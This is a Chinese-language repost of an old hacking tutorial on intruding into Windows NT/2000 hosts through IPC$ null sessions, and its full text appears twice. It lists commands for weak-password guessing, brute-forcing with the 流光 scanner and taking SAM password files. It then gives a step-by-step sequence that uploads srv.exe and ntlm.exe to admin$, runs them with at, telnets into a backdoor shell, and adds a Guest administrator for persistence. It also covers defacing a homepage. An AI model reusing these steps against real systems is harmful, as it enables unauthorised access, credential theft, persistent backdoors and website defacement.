IPC$空連接主機步驟與簡單***示例
IPC$的定義:IPC$是共享“命名管道”的資源,它是爲了讓進程間通信而開放的命名管道,在遠程管理計算機和查看計算機的共享資源時使用。
IPC$的作用:利用IPC$可以與目標主機建立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得到目標主機上的用戶列表。用“流光”的IPC$探測功能,可以得到用戶列表,並配合字典,進行密碼嘗試。
IPC$空連接主機步驟:
1、首先要掃到能建立IPC$空連接的主機,有了目標才能進攻,推薦使用安全焦點的xscan_gui v1.3,該軟件使用方法很簡單,而且速度快,也許還能掃出其他漏洞。
2、詳細瞭解NET命令,做IPC$空連接主機是不可不知NET命令使用的。
3、如果知道對方的用戶名和密碼,就用下面這個命令:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
退出的命令是:
net use \\127.0.0.1\ipc$ /delte
4、大部分情況下我們都不知道對方機器的用戶名和密碼。這就需要知道他的IP,我們使用用ping命令,格式爲:ping www.xxx.com(如果用QQ聊天更簡單,現在好多QQ都顯IP的), 用追捕查他的操作系統,用戶名等。現在信息都有了,然後大家試試弱智點的密碼,如:123,12345,123456,用戶名就是Administrator。運氣好的話就可以進入了。
5、實在猜不出密碼的話就只有用榕哥的大作――流光,運行探測――掃描POP3/FTP/NT/SQL主機,會出現“主機掃描設置”,在“掃描範圍”中分別填寫“開始地址”與“結束地址”,這步你可以選擇要掃描的IP段,也可以只填某一IP,掃描主機類型”選擇“NT/98”,然後開始掃描,如果單掃某一IP,我建議掃描主機類型選ALL,選項選中的內容不要取消,這樣可以看看他的機器是什麼顏色的,具體表示看下錶:
紅色:該主機安裝了FrontPage擴展,並沒有權限設置。如果掃到紅色的,你可以打開FrontPage,在打開那裏填上他的IP地址,接着你就知道怎麼做了。
藍色:表示該主機上安裝了FrontPage擴展。
黑色:遠程執行命令。你可以單擊該主機――連接,就可以用DOS命令操作遠程計算機,如:dir c:\
黃色:直接下載對方SAM文件(SAM文件是NT下儲存用戶和密碼的文件,下載後用LC3可以解開)。
綠色:將對方SAM文件上傳到指定的FTP服務器。
6、現在知道了他主機的情況,就可以開始探測他的用戶列表了!右鍵點IPC$主機-探測-探測所有IPC$用戶列表,下面兩個對話框的設置都選上,我們只要IPC$管理員的弱口令。在結果點擊右鍵,探測用戶列表,Administrstor(超級用戶)直接探測到ADMIN的密碼,如果實在不行,我們還可以拿其他用戶“開刀”,然後在想辦法讓他變成超級用戶。
7、得到用戶名和密碼我們就可以連接了。打開win2000下的cmd.exe(也就是命令提示符)。然後重複第二步教過的連接連接命令:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
成功連接後顯示命令成功完成。
8、現在你可以用copy命令把你想要上傳的東西放到他的機器裏。
9、如果你想黑他頁面的話就找到網頁所在的目錄,如:c:\inetpub\wwwroot,用命令:
copy c:\index.htm \\IP地址\c$\inetpub\wwwroot
這裏的c:\index.htm指的是你作好的網頁,上傳替換掉原先的文件就可以改他的主頁。
其他的操作方式就自己開發吧!以下提供幾條有用的命令:
建立空連接
net use \\IP\ipc$ "" /user:""
建立非空連接
net use \\IP\ipc$ "用戶名" /user:"密碼"
映射默認共享
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射爲自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令:
net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典***示例
1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名爲administrators,密碼爲"空"的IP地址,如果是打算***的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因爲密碼爲"空",所以第一個引號處就不用輸入,後面一個雙引號裏的是用戶名,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先複製srv.exe上去,在流光的Tools目錄下就有(這裏的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。
3.C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是2005/5/1上午11:00,命令成功完成。
4.C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啓動srv.exe吧(這裏設置的時間要比主機時間快,不然無法啓動)。
5.C:\>net time \\127.0.0.1
再查查到時間沒有,如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
6.C:\>telnet 127.0.0.1 99
這裏會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中爲我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了。
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啓動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啓動正常。然後使用"net start telnet"來開啓Telnet服務!
9.Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!然後你想做什麼就做什麼吧。
爲了以防萬一,我們再把guest激活加到管理組。
10.C:\>net user guest /active:yes
將對方的Guest用戶激活。
11.C:\>net user guest 1234
將Guest的密碼改爲1234,或者你要設定的密碼。
12.C:\>net localgroup administrators guest /add
將Guest變爲Administrator (如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機) 。
其他操作就看您的能力和水平了,自己揣摩吧!
注:此爲本人幾年前收藏的經典網文,雖然好多命令和工具均已無法正常運行,但其思路和方法仍然值得網絡安全愛好者學習,在此向原作者表示致敬!
IPC$的作用:利用IPC$可以與目標主機建立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得到目標主機上的用戶列表。用“流光”的IPC$探測功能,可以得到用戶列表,並配合字典,進行密碼嘗試。
IPC$空連接主機步驟:
1、首先要掃到能建立IPC$空連接的主機,有了目標才能進攻,推薦使用安全焦點的xscan_gui v1.3,該軟件使用方法很簡單,而且速度快,也許還能掃出其他漏洞。
2、詳細瞭解NET命令,做IPC$空連接主機是不可不知NET命令使用的。
3、如果知道對方的用戶名和密碼,就用下面這個命令:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
退出的命令是:
net use \\127.0.0.1\ipc$ /delte
4、大部分情況下我們都不知道對方機器的用戶名和密碼。這就需要知道他的IP,我們使用用ping命令,格式爲:ping www.xxx.com(如果用QQ聊天更簡單,現在好多QQ都顯IP的), 用追捕查他的操作系統,用戶名等。現在信息都有了,然後大家試試弱智點的密碼,如:123,12345,123456,用戶名就是Administrator。運氣好的話就可以進入了。
5、實在猜不出密碼的話就只有用榕哥的大作――流光,運行探測――掃描POP3/FTP/NT/SQL主機,會出現“主機掃描設置”,在“掃描範圍”中分別填寫“開始地址”與“結束地址”,這步你可以選擇要掃描的IP段,也可以只填某一IP,掃描主機類型”選擇“NT/98”,然後開始掃描,如果單掃某一IP,我建議掃描主機類型選ALL,選項選中的內容不要取消,這樣可以看看他的機器是什麼顏色的,具體表示看下錶:
紅色:該主機安裝了FrontPage擴展,並沒有權限設置。如果掃到紅色的,你可以打開FrontPage,在打開那裏填上他的IP地址,接着你就知道怎麼做了。
藍色:表示該主機上安裝了FrontPage擴展。
黑色:遠程執行命令。你可以單擊該主機――連接,就可以用DOS命令操作遠程計算機,如:dir c:\
黃色:直接下載對方SAM文件(SAM文件是NT下儲存用戶和密碼的文件,下載後用LC3可以解開)。
綠色:將對方SAM文件上傳到指定的FTP服務器。
6、現在知道了他主機的情況,就可以開始探測他的用戶列表了!右鍵點IPC$主機-探測-探測所有IPC$用戶列表,下面兩個對話框的設置都選上,我們只要IPC$管理員的弱口令。在結果點擊右鍵,探測用戶列表,Administrstor(超級用戶)直接探測到ADMIN的密碼,如果實在不行,我們還可以拿其他用戶“開刀”,然後在想辦法讓他變成超級用戶。
7、得到用戶名和密碼我們就可以連接了。打開win2000下的cmd.exe(也就是命令提示符)。然後重複第二步教過的連接連接命令:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
成功連接後顯示命令成功完成。
8、現在你可以用copy命令把你想要上傳的東西放到他的機器裏。
9、如果你想黑他頁面的話就找到網頁所在的目錄,如:c:\inetpub\wwwroot,用命令:
copy c:\index.htm \\IP地址\c$\inetpub\wwwroot
這裏的c:\index.htm指的是你作好的網頁,上傳替換掉原先的文件就可以改他的主頁。
其他的操作方式就自己開發吧!以下提供幾條有用的命令:
建立空連接
net use \\IP\ipc$ "" /user:""
建立非空連接
net use \\IP\ipc$ "用戶名" /user:"密碼"
映射默認共享
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射爲自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令:
net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典***示例
1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名爲administrators,密碼爲"空"的IP地址,如果是打算***的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因爲密碼爲"空",所以第一個引號處就不用輸入,後面一個雙引號裏的是用戶名,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先複製srv.exe上去,在流光的Tools目錄下就有(這裏的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。
3.C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是2005/5/1上午11:00,命令成功完成。
4.C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啓動srv.exe吧(這裏設置的時間要比主機時間快,不然無法啓動)。
5.C:\>net time \\127.0.0.1
再查查到時間沒有,如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
6.C:\>telnet 127.0.0.1 99
這裏會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中爲我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了。
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啓動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啓動正常。然後使用"net start telnet"來開啓Telnet服務!
9.Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!然後你想做什麼就做什麼吧。
爲了以防萬一,我們再把guest激活加到管理組。
10.C:\>net user guest /active:yes
將對方的Guest用戶激活。
11.C:\>net user guest 1234
將Guest的密碼改爲1234,或者你要設定的密碼。
12.C:\>net localgroup administrators guest /add
將Guest變爲Administrator (如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機) 。
其他操作就看您的能力和水平了,自己揣摩吧!
注:此爲本人幾年前收藏的經典網文,雖然好多命令和工具均已無法正常運行,但其思路和方法仍然值得網絡安全愛好者學習,在此向原作者表示致敬!